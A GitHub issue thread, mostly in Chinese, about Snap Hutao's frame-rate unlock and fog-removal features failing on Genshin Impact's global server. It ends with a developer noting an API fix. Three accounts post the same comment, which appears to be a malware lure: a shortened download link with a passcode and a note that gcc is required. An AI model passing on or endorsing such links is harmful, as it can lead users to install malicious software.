### ISSUE TITLE
[Bug]:国际服解锁帧率无法正常使用

### ISSUE THREAD

**Issue by MiKasaJL** [DGP-Studio/Snap.Hutao#1957]
### 检查清单

- [X] 我已阅读 Snap Hutao 文档中的[常见问题](https://hut.ao/advanced/FAQ.html)和[常见程序异常](https://hut.ao/advanced/exceptions.html)，我的问题没有在文档中得到解答
- [X] 我知道[文档站](https://hut.ao/zh/menu.html)的导航栏中有**搜索功能**，且已经搜索过相关关键词
- [X] 我的问题不是[已完成](https://github.com/DGP-Studio/Snap.Hutao/issues?q=is%3Aopen+is%3Aissue+label%3A%E5%B7%B2%E5%AE%8C%E6%88%90)的问题也不是一个别人已发布的**重复的**问题

### Windows 版本

22631.3007

### Snap Hutao 版本

1.11.1.0

### 设备 ID

A944AC070260AE2FD93FCDD9AB8F57BE

### 问题分类

游戏启动器

### 发生了什么？

正如标题所说，解锁帧率，去迷雾，调整视野功能无法正常使用，游戏内和显卡驱动均检查没问题，显卡是RX5700,用的1920*1080进行游戏，应该可以排除显卡性能问题？

### 你期望发生的行为？

恢复功能

### 最后一步

- [X] 我认为上述的描述已经足以详细，以允许开发人员能复现该问题

**Comment by sanketkorde** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by OldSnailCPP** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by danilobalderramas** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by SSB-ARFCN** [comment]
不是  這是在洗帖嗎? 內容完全一致

**Comment by Lightczx** [comment]
启动游戏后胡桃是否弹出了提示 @MiKasaJL

**Comment by SSB-ARFCN** [comment]
+1 我這邊國際服也失效

**Comment by SSB-ARFCN** [comment]
卡正在嘗試解鎖FPS上限

**Comment by SSB-ARFCN** [comment]
https://www.mediafire.com/file/pgutmx752xdm0hg/2024.09.06+-+22.03.30.01.mp4/file

**Comment by Lightczx** [comment]
@Masterain98 似乎他们无法下载 client feature 文件

**Comment by Lightczx** [comment]
@MiKasaJL @SSB-ARFCN @RJFAC 浏览器打开 https://api.snapgenshin.com/client/UnlockerIsland_5.0.0.json
发截图

**Comment by Lightczx** [comment]
胡桃是否有提示无法加密指定的文件

**Comment by Lightczx** [comment]
设置里打开调试控制台启动游戏后看下控制台输出

**Comment by SSB-ARFCN** [comment]
昨天晚上我這邊正常了 去霧也能用

**Comment by Lightczx** [comment]
昨天调整的api
